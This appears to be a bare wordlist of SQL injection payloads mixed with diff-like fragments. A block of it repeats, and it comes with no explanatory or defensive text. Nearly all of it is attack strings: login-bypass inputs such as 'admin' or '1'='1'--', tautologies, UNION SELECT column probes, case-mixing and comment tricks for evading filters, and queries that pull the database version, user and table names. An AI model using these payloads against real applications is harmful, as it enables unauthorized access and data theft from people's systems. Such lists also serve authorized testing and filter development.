")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
